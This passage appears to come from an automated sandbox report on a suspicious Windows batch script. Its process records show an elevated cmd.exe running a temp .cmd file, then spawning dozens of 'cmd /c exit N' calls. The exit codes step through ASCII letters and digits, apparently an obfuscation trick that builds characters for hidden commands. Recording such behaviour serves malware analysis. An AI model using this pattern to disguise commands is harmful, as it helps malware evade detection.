                      MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: high
                      Has exited: false

                      Target ID: 3
                      Start time: 08:51:32
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\.cmd""
                      Imagebase: 0x7ff6eb690000
                      File size: 289'792 bytes
                      MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: high
                      Has exited: false

                      Target ID: 4
                      Start time: 08:51:32
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: cmd /c exit 97
                      Imagebase: 0x7ff6eb690000
                      File size: 289'792 bytes
                      MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: high
                      Has exited: true

                      Target ID: 5
                      Start time: 08:51:32
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: cmd /c exit 98
                      Imagebase: 0x7ff6eb690000
                      File size: 289'792 bytes
                      MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: high
                      Has exited: true

                      Target ID: 6
                      Start time: 08:51:32
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: cmd /c exit 99
                      Imagebase: 0x7ff6eb690000
                      File size: 289'792 bytes
                      MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: high
                      Has exited: true

                      Target ID: 7
                      Start time: 08:51:32
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: cmd /c exit 100
                      Imagebase: 0x7ff6eb690000
                      File size: 289'792 bytes
                      MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: high
                      Has exited: true

                      Target ID: 8
                      Start time: 08:51:32
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: cmd /c exit 101
                      Imagebase: 0x7ff6eb690000
                      File size: 289'792 bytes
                      MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: high
                      Has exited: true

                      Target ID: 9
                      Start time: 08:51:32
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: cmd /c exit 102
                      Imagebase: 0x7ff6eb690000
                      File size: 289'792 bytes
                      MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: high
                      Has exited: true

                      Target ID: 10
                      Start time: 08:51:32
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: cmd /c exit 103
                      Imagebase: 0x7ff6eb690000
                      File size: 289'792 bytes
                      MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: high
                      Has exited: true

                      Target ID: 11
                      Start time: 08:51:32
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: cmd /c exit 104
                      Imagebase: 0x7ff6eb690000
                      File size: 289'792 bytes
                      MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: high
                      Has exited: true

                      Target ID: 12
                      Start time: 08:51:32
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: cmd /c exit 105
                      Imagebase: 0x7ff6eb690000
                      File size: 289'792 bytes
                      MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: high
                      Has exited: true

                      Target ID: 13
                      Start time: 08:51:32
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: cmd /c exit 106
                      Imagebase: 0x7ff6eb690000
                      File size: 289'792 bytes
                      MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: high
                      Has exited: true

                      Target ID: 14
                      Start time: 08:51:32
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: cmd /c exit 107
                      Imagebase: 0x7ff6eb690000
                      File size: 289'792 bytes
                      MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Has exited: true

                      Target ID: 15
                      Start time: 08:51:32
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: cmd /c exit 108
                      Imagebase: 0x7ff6eb690000
                      File size: 289'792 bytes
                      MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Has exited: true

                      Target ID: 16
                      Start time: 08:51:32
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: cmd /c exit 109
                      Imagebase: 0x7ff6eb690000
                      File size: 289'792 bytes
                      MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Has exited: true

                      Target ID: 17
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 110
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:18
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 111
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:19
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 112
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:20
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 113
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:21
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 114
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:22
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 115
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:23
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 116
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:24
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 117
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:25
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 118
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:26
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 119
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:27
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 120
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:28
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 121
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:29
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 122
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:30
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 65
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:31
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 66
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:32
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 67
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:33
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 68
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:34
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 69
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:35
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 70
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:36
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 71
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:37
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 72
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:38
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 73
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:39
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 74
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:40
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 75
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:41
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 76
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:42
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 77
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:43
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 78
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:44
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 79
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:45
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 80
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:46
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 81
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:47
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 82
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:48
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 83
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:49
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 84
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:50
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 85
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:51
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 86
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:52
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 87
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:53
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 88
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:54
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 89
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:55
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 90
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:56
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 48
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:57
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 49
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:58
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 50
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:59
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 51
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:60
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 52
                      Imagebase:0x7ff7403e0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:61
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 53
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:62
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 54
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:63
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 55
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:64
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 56
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:65
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 57
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:66
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 123
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:67
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 125
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:68
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 63
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:69
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 58
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:70
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 46
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:71
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 61
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:72
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 44
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:73
                      Start time:08:51:37
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 95
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
